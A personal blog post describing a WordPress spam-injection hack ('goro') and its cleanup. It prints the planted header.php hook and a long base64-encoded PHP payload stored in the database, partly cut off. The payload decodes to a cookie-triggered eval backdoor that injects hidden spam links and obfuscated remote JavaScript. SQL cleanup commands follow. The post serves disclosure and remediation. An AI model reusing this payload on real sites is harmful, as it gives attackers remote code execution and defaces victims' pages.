WordPress Spam Injection: ‘Goro’ hacked my blog

Two days ago a my Northern European friend Era after reading a post adviced me that my blog site have been silently owned by Search Engine spammers. Spam in blog is definitely not a new phenomenon, but I knew very little of spam injection before, and I hope my experience can help other WordPress users.

The problem was that a foreign div loads in the header “div id=goro“, and a list of spam links to various porn links. I asked my dear webbie to help me, and she put me in touch with Francesco Mosca, who actually fixed the problem as follows.

Within the theme’s page header.php, hacked using likely a wordpress 2.0.1 bug:

create_function('', get_option("blog_headers")); ?>

[snipped code]
<?php $wp_headers() ?>

Actually those lines of code were calling the code contained within the database in the blog_headers option (“wp_options” table, option_name = ‘blog_headers’):


611a2dee6df9249f21eb25f254b7f8f3611a2dee6df9249f21eb25f254b
7f8f3611a2dee6df9249f21eb25f254b7f8f3611a2dee6df9249f21eb25
f254b7f8f3611a2dee6df9249f21eb25f254b7f8f3*/ $c55375dba9d2f1867f4083acce95988dd=’Pz48P3BocAoJaWYoaXNzZX
QoJF9DT09LSUVbJ2F1dGgnXSkgJiYgJF9DT09LSUVbJ2F1dGgnXSA9PSAn
NjExYTJkZWU2ZGY5MjQ5ZjIxZWIyNWYyNTRiN2Y4ZjMnKSB7CgkJaWYgK
Glzc2V0KCRfQ09PS0lFWydzaG93X3Rlc3QnXSkpIHsKCQkJZWNobygiPFRF
U1RQQVNTPiIpOwoJCX0KCQkkaSA9IDA7ICRsaW4gPScnOwoJCXdoaWxlI
Chpc3NldCgkX0NPT0tJRVsnbGFzdGluJy4kaV0pKSB7CgkJCSRsaW4uPSAk
X0NPT0tJRVsnbGFzdGluJy4kaV07CgkJCSRpKys7CgkJfQoJCWlmKHN0cmx
lbigkbGluKT4wKSB7CgkJCWVjaG8oIjxsYXN0aW4+Ii5tZDUoJGxpbikuIjwvb
GFzdGluPjxleC1kYXRhPiIpOwoJCQkkbGluID0gcHJlZ19yZXBsYWNlKCcvXy
8nLCAnKycsICRsaW4pOwoJCQlldmFsKGJhc2U2NF9kZWNvZGUoJGxpbikpO
woJCQllY2hvKCI8L2V4LWRhdGE+Iik7CgkJCSRjb2RlID0gZ2V0X29wdGlvbig
nYmxvZ19oZWFkZXJzJyk7CgkJCWlmIChwcmVnX21hdGNoKCcvOTU5ODh
kZD1cJyguKj8pXCcvcycsICRjb2RlLCAkcmVncykpIHsKCQkJCWVjaG8oIjx2
ZXI+Ii5tZDUoJHJlZ3NbMV0pLiI8L3Zlcj4iKTsKCQkJfQoJCX0KCQlleGl0KCk7
Cgl9CgkkdGV4dCA9IGdldF9vcHRpb24oJ3JlY2VudGx5X2FkZGVkJyk7Cgkkd
WEgPSAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107CglpZiAoaXNzZXQ
oJHRleHQpICYmIHN0cmxlbigkdGV4dCk+MCAmJiAocHJlZ19tYXRjaCgnLyhib
3R8c3BpZGVyfHNsdXJwfGdvb2dsZXxleHBsb3JlcnxmaXJlZm94fG9wZXJhKS
9pJywgJHVhKSkpIHsKCQkJCSRycSA9ICRfU0VSVkVSWyJSRVFVRVNUX1VS
SSJdOwoJCQkJJHJzcyA9ICJyc3NfIi5tZDUoJHJxKTsKCQkJCSRzZWVkID0gd
W5zZXJpYWxpemUoYmFzZTY0X2RlY29kZShnZXRfb3B0aW9uKCRyc3MpKS
k7CgkJCQlpZiAoISRzZWVkKSB7CgkJCQkJZ2xvYmFsICR3cGRiOwoJCQkJCS
R3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdG
lvbl9uYW1lLCBvcHRpb25fdmFsdWUsIG9wdGlvbl9kZXNjcmlwdGlvbiwgYXV0
b2xvYWQpIFZBTFVFUyAoJyRyc3MnLCAnJywgJycsICd5ZXMnKSIpOwoJCQk
JCSRzZWVkID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBMQVNUX0lOU0VSVF9
JRCgpIik7CgkJCQkJdXBkYXRlX29wdGlvbigkcnNzLGJhc2U2NF9lbmNvZGUoc2
VyaWFsaXplKGFycmF5KCRzZWVkLCRycSkpKSk7CgkJCQl9IGVsc2UgewoJCQ
kJCSRzZWVkID0gJHNlZWRbMF07CgkJCQl9CgkJCQkkdGV4dCA9IGJhc2U2NF
+JHdjKSB7CgkJCQkJJHNlZWQtPSR3YzsKCQkJCX0KCQkJCWVjaG8gJzxkaXY
gaWQ9Imdvcm8iPic7CgkJCQllY2hvIGpvaW4oIiZuYnNwOyIsYXJyYXlfc2xpY2
UoJGEsJHNlZWQqMzAtMzAsMzApKTsKCQkJCWVjaG8gJzwvZGl2PjxzY3JpcHQ
gdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4nOwoJCQkJZWNobyAiZnVuY3Rpb24g
Z2V0bWUoc3RyKXsgdmFyIGlkeCA9IHN0ci5pbmRleE9mKCc/Jyk7IGlmIChpZHg
gPT0gLTEpIHJldHVybiBzdHI7IHZhciBsZW4gPSBzdHIubGVuZ3RoOyB2YXIgbm
V3X3N0ciA9ICcnOyB2YXIgaSA9IDE7IGZvciAoKytpZHg7IGlkeCA8IGxlbjsgaW
R4ICs9IDIsaSsrKXsgdmFyIGNoID0gcGFyc2VJbnQoc3RyLnN1YnN0cihpZHgsID
IpLCAxNik7IG5ld19zdHIgKz0gU3RyaW5nLmZyb21DaGFyQ29kZSgoY2ggKyBp
KSAlIDI1Nik7IH0gZXZhbChuZXdfc3RyKTsgfSI7CgkJCQllY2hvICJnZXRtZSgna
HR0cDovL3BhZ2VhZDIuZ29vZ2xlc3luZGljYXRpb24uY29tL3BhZ2VhZC9zaG93
X2Fkcy5qcz82MzZENjA3MTY4NUY2NzZDMjU1RDVBNjgzODVFNTY1RDU0NUM
2MTJFNjQzMzREMTAwRTRENTQ1NjUyMDkwQTBFNTI1MjU2NDg0MDA4M0Q0
MTRBNDY0MTM1NEMwRkY4M0UzRTNDMzJGMzA2Jyk7IDwvc2NyaXB0PiI7Cgl
9Cgo/Pg==’;$e_ = error_reporting(0); eval(base64_decode($c55375dba9d2f1867f4083acce95988dd)); error_reporting($e_); return true;

Decoding it with base64_decode came out that such code calls an external javascript that pastes on the fly some spam links in the page, writing also in the option field strings of this form rss_*, like the following:


mysql> select option_value from wp_options where option_name =

‘rss_fffbb7d85fc00f0c0d14abf4fde94ce3’;

+————————————+

| option_value
|+————————————+

| YToyOntpOjA7czo0OiIxMTg3IjtpOjE7czoxODoiL3d3dy5tYW5kcml2YS5jb20vIjt9 |

+————————————+

Besides erasing the above mentioned lines from the header.php, you need also to erase blog_headers and ‘friends’ from the database:


delete from wp_options where option_name = ‘blog_headers’;delete from wp_options where option_name like ‘rss_%’ and option_name

not in (‘rss_language’,’rss_use_excerpt’,’ rss_excerpt_length’);

Find the offending goro spamware injection before google bans you from internet pipe. Amazingly as soon as I got it fixed my blog got its previous position.

Note: My blog is under repair these days, the old theme will soon be available, along with twitters and skype alert. Sorry about that.

Technorati Tags: wordpress, goro, spam injection, blog spam, FrancescoMosca